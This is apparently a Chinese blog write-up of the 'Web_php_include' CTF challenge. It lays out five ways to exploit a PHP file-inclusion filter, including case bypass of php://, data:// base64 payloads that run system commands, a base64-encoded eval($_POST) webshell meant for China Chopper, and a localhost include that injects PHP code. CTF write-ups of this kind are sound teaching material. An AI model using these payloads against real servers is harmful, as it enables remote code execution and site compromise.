Web_php_include总结五种解法大同小异

Web_php_include解题详解

                                                                                           ————一念既出，万山无阻

分析——解题——总结

1.分析
代码不长，咱们慢慢分析
第一句是语法高亮，show_source() 函数对文件进行语法高亮显示。 本函数是 highlight_file() 的别名。
第二句是get 传给hello参数这里可以构造payload：

/?hello=1

发现页面有回显可利用点在后面说到
接着，strstr()函数

这里是例子1在起作用，意思是当传给page的参数里有php://时，会自动过滤掉，但是此函数对大小写敏感，构造Php://就不起作用了，而stristr()函数对大小写不敏感噢
接着是str_replace（）函数
意思是当传给page的参数里有php://时替换为空，大写可以一并绕过

解题
方法一：hackbar或bp传参
当时写题目的时候先用的hackbar，怎么输都没反应，一直以为自己输入的不对，后来发现自己怎么点Execute页面都不加载也没反应，翟神说这是被过滤了,要构造a=,但是还是没反应，试试Burpsuite

然后payload:

 a = <?php system('cat fl4gisisish3r3.php');?>

得到flag

 ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

方法二：御剑更改数据库

虽然攻防世界里的大多数wp都是这个，但是个人不喜欢用，root，没设密码是剧情需要吧

其余解法是看了其他师傅的思路，简要概述一下吧

方法三：data://伪协议执行命令利用

这里是引用既然过滤了php://的伪协议 我们可以使用其他协议来做这里使用data://伪协议
data://伪协议
php5.2.0起，数据流封装器开始有效，主要用于数据流的读取。如果传入的数据是PHP代码，就会执行代码
使用方法:data://text/plain;base64,xxxx(base64编码后的数据)
这里是引用 base64编码后使用
http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJkaXIisssKT8%2b (注意编码后的+号要URL编码)
这里是引用 base64编码后使用
http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

查看源码得到flag

方法四：data://伪协议传木马

这里是引用 base64加密后拼接
http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==
菜刀连接即可:

这两个方法是借鉴笑花大王师傅的blog,第一次看成了校花咳咳

方法五：hello
来填最上面的坑
随风kali师傅的解决方法（当时我也发现了，但是却没有想到，还是太菜了）

这里是引用hello是有回显的，所以说不定这里可以命令执行然后回显到浏览器
构造：

/?page=http://127.0.0.1/?hello=<?php system("ls")?>

/?page=http://127.0.0.1/?hello=<?show_source ("fl4gisissh3r3.php")?>

即可得到你想要的东西

总结

总结的比较简单了，只是因为结果和方法一都差不多，不想增加篇幅。

第一次写blog，写了超久，还是有很多东西不会的，所以不是完全自己写出来的blog,借鉴了很多其他师傅的方法，还算让自己满意吧，接下来便是继续干干干。侵权私信删除

唐神今天说了一句话，不太记得了，我的话来说就是：
身体和灵魂都在路上，疲惫的只是身体，而灵魂要一直向前！

2020.11.18